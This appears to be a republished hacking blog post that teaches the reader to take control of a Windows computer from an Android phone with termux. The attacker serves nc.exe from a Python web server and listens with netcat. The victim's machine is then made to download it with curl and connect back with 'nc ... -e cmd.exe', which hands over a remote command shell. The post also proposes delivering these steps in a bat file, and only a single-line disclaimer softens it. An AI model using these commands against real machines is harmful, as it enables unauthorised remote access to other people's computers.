Hack Any Computer System just with your Android Device.

1 year ago 65
BOOK THIS SPACE FOR AD
ARTICLE AD

Hello learners, I hope you all are doing well. As you all have knew that today we are going to hack a computer system using our Android Device, so without further ado let’s get into it.

DISCLAIMER: Do not use this technique to hack anyone unless you have permissions otherwise you will go to jail.

So for this particular hack, I used an Android Device with termux kali-nethunter installed.

Note : Nethunter is optional you can do the same with just termux only.

First of all, let me just tell you about some basics of reverse connection, So in reverse connection, attackers do not connect to their target but the target connects to the attacker. I know a bit confusing right??

Just take a look at the picture and you can see that the attacker is not able to connect to the victim as the victim’s system is in the protection of a firewall. As an attacker, we are not able to go inside but we can force the person to come outside, this is what a reverse connection is.

Today we are going to use this technique to hack a computer using an Android Device. First, you need to download a file called nc.exe on your Attacking system which is, in this case, an Android Device for that just go through this link.

As you can see I have downloaded the file and it is in my Android System

After installing this file you need to start a server so that the victim can download this file, for that just type a simple command to start a python server.

python3 -m http.server 8080

And HIT Enter.

this command will start a server at port 8080.

After this, we need to start a listener so that our system is ready to listen to connection from our victim, for that we need to just type the following command in our termux.

nc -nlvp 4444

This command will start a listener at port 4444. See the screenshot below

Now we are done from the attacker side so let's move to the victim side. In the victim's computer, you can transfer a bat file to run the following command but for today’s tutorial, we are going to type the commands manually. If you wanna learn about bat file attacks just comment it down.

First, you need to download the nc.exe file from our server which we already started in our Android system for that we should know the IP address of our android system for that just type a simple basic command ifconfig.

As you can see 192.168.96.70 is the IP address in my case, in your case it may differ. After knowing the IP address just type the following command into the victim’s system.

curl -o nc.exe http://192.168.96.70:8080/nc.exe

we use the curl command which is now pre-installed in most of the windows operating systems. To check if it is installed or not just simply type a curl and Hit Enter and you should get the curl—help option prompt on your screen if it is not prompting on your system you need to install the curl command first.

after downloading nc.exe from our server just type the following command

nc 192.168.96.70 4444 -e cmd.exe

Here, we use nc command which we installed from our server. I use my IP Address you can replace it with yours with the port you are listening on, -e is for specifying the shell in windows we have cmd.exe shell only.

Hit Enter after typing the above command and nothing happened in the victim’s system Don’t worry check the Android system and see we got a cmd Prompt. Boom.! we hacked a computer system with just an Android Device.

Do you see how easy is to hack a system just with your Android Device? just practice this trick to learn more about hacking till then just keep learning, keep exploring, and do hacking.

Read Entire Article